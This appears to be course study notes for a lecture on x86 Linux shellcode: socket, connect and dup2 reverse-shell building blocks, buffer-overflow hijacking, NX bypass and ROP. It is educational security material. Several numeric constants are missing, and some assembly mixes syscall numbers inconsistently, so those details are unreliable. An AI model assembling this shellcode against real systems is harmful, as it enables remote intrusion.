cs1650 - Lecture10 - Detailed Study Notes on Shell Coding, System Calls, and Code Reuse Techniques
Overview of Shell Coding and System Calls
Understanding the principles of shell coding, particularly in relation to system calls like
socket,connect, anddup2.Emphasis on minimizing code size, crucial for fitting shellcode into small buffer overflows, and using various clever tricks to manage the execution flow and make the shellcode position-independent.
Introduction to Socket System Call
System call for creating a socket:
socket.Arguments to
socket:Domain:
AF_INET(value ), for IPv4 internet protocols.Type:
SOCK_STREAM(value ), for connection-oriented TCP sockets.Protocol: (default protocol, usually TCP for
SOCK_STREAM).
How to determine constants: consult header files (e.g.,
<sys/socket.h>), read man pages (e.g.,man 2 socket), or write small C programs to print their values.
Implementation Steps for Socket Creation
Store the
socketsystem call number ( on Linux x86) in theEAXregister.Set arguments in
EBX,ECX,EDXregisters:(forAF_INET) intoEBX.(forSOCK_STREAM) intoECX.(for default protocol) intoEDX.
Invoke the
int 80instruction to execute the system call. The new socket's file descriptor is returned inEAX.; conceptual assembly for socket(AF_INET, SOCK_STREAM, 0) mov eax, 0xa7 ; syscall number 167 (0xa7 in hex) for socketcall ; The actual socket syscall on x86 is often wrapped by 'socketcall' ; For direct socket, it might depend on kernel version. Let's use 167 as specified. mov ebx, 0x2 ; AF_INET mov ecx, 0x1 ; SOCK_STREAM mov edx, 0x0 ; Protocol 0 int 0x80 ; EAX now holds the socket file descriptor
Efficiency in Shell Code
Different encoding techniques can minimize byte size for instructions, which is critical for shellcode.
Using
pushandpopinstructions effectively to transfer values to registers, often saving bytes compared tomovinstructions.Example of encoding efficiency:
To place the value into
EAXusingMOV, it would bemov eax, 0x43(5 bytes:B8 43 00 00 00).Using
pushwith an 8-bit immediate:push 0x43would encode as6A 43(2 bytes), then followed bypop eax(1 byte:58), totaling 3 bytes. This is more efficient for small immediate values.
Sequence of Instructions
Using various instructions to manipulate register values and the stack:
MOVto place immediate values or register contents into other registers or memory.POPto retrieve values from the top of the stack into registers.INC(increment) andDEC(decrement) to alter register values conveniently in smaller instructions, often used for values like or small offsets.
Data Structure for Connection via connect
Details on the
sockaddr_indata structure passed to theconnectcall, which defines the target address:sin_family: Field for address family (2 bytes,AF_INET, value ).sin_port: Field for port (2 bytes, e.g., ). This must be in network byte order.sin_addr: Field for IP address (4 bytes, e.g.,127.0.0.1). This also must be in network byte order.
Layout of the
sockaddr_instructure in memory (conceptual):+-------------------+ <-- Address of structure (e.g., ESP) | AF_INET (0x0002) | 2 bytes, network byte order +-------------------+ | Port (e.g., 0x1F90) | 2 bytes, network byte order (8080 = 0x1F90) +-------------------+ | IP (e.g., 0x0100007F) | 4 bytes, network byte order (127.0.0.1 = 0x7F000001 reversed) +-------------------+ | Padding (0x00000000, 8 bytes) | +-------------------+ <-- Size is typically 16 bytes for sockaddr_in
Connection Sequence
Execute the
connectsystem call after the socket creation, which yields a file descriptor.Use the socket file descriptor (returned by
socket) as the first argument forconnect(inEBX).Prepare the
sockaddr_instructure on the stack with the target IP and port.The second argument (in
ECX) will be a pointer to thissockaddr_instructure (e.g.,ESP).The third argument (in
EDX) will be the size of the structure (e.g., bytes forsockaddr_in).Use
int 80to make theconnectcall and check for errors or success based on theEAXreturn value (typically for success, for error).; conceptual assembly for connect(sockfd, &sockaddr_in_ptr, sizeof(sockaddr_in)) ; EAX = sockfd (from previous socket call) push 0x0100007f ; IP 127.0.0.1 (network byte order) push word 0x901f ; Port 8080 (network byte order: 0x1f90) push word 0x2 ; AF_INET (0x0002) mov ecx, esp ; pointer to sockaddr_in structure on stack mov edx, 0x10 ; size of sockaddr_in (16 bytes) mov eax, 0xa7 ; syscall number 167 for socketcall mov ebx, sock_fd_value ; The file descriptor from socket call ; Sub-call for connect needs to be handled via socketcall. Syscall arg for connect is 0x3 ; This implies structure for socketcall ; For clarity, assuming direct connect syscall for demonstration purpose, if not using socketcall wrapper ; If using socketcall: eax=102, ebx=SYS_CONNECT (3), ecx=ptr to args (sockfd, ptr_to_sockaddr, len) mov eax, 0x66 ; Syscall number 102 (0x66) for socketcall mov ebx, 0x3 ; SYS_CONNECT constant for socketcall wrapper push edx ; Push len (0x10) push ecx ; Push ptr_to_sockaddr push sock_fd_value ; Push socket_fd mov ecx, esp ; ECX points to the arguments array for socketcall int 0x80 ; EAX now holds return value (0 for success)
Duplication of File Descriptors
Use
dup2system call to duplicate file descriptors for standard input (), standard output (), and standard error (), redirecting them to the established socket.The
dup2syscall number on Linux x86 is (or0x3F).Sequence of operations for duplicating the socket file descriptor (
oldfd) tostdin,stdout,stderr(newfd):The
dup2syscall requires:EAXmust hold(decimal ).EBXmust hold theoldfd(the socket file descriptor).ECXmust hold thenewfd(which will be , then , then ).
; conceptual assembly for dup2(sockfd, 0), dup2(sockfd, 1), dup2(sockfd, 2) mov ebx, sock_fd_value ; Load socket fd into EBX (oldfd) mov ecx, 0x2 ; Start with newfd = 2 (stderr) loop_dup: mov eax, 0x3f ; Syscall number 63 (0x3F) for dup2 int 0x80 dec ecx ; Decrement newfd (2 -> 1 -> 0) jns loop_dup ; Loop while ECX is not negative (i.e., for 2, 1, 0)
Handling Control Flow Hijacking
The process of hijacking the control flow, typically via overwriting return addresses on the stack during a buffer overflow.
This allows an attacker to steer program execution from its legitimate path to arbitrary shellcode injected into memory.
When a function returns, the
EIP(instruction pointer) is loaded with the address stored at the top of the stack. By overwriting this address with the entry point of injected shellcode, control is transferred.
Non-Executable Memory and Code Reuse
Introduction of non-executable pages (e.g., Data Execution Prevention, NX bit) as a defense mechanism to prevent execution of code from data segments (like the stack or heap).
Explanation of the
mProtectsystem call for altering memory permissions (e.g.,PROT_EXECto make a page executable).mProtectarguments include:addr(start address),len(length of region), andprot(protection flags likePROT_READ | PROT_WRITE | PROT_EXEC).
Code Injection Techniques
Discussion on bypassing non-execution protections without directly injecting new executable assembly code.
How to leverage existing code already present in memory (e.g., within shared libraries like
libc) rather than injecting new assembly code directly.This method, known as Return-Oriented Programming (ROP), involves chaining small sequences of existing instructions (called "gadgets") that end in a
retinstruction. By carefully controlling the stack, these gadgets can be executed in sequence to perform arbitrary operations, effectively creating new logic from existing code.
Structuring Shell Code for Execution
Crafting shell code (or ROP chains) in such a way that it can resume control to already present functions after executing its payload or perform complex operations using chained gadgets.
Building diagrammatic representations of where stack pointers (
ESP) point during controlled execution, showing how return addresses are manipulated to call gadgets and manage function arguments on the stack.
Conclusion and Future Directions
Continued exploration of the nuances in bypassing memory protections through direct control of memory and exploitation techniques.
High-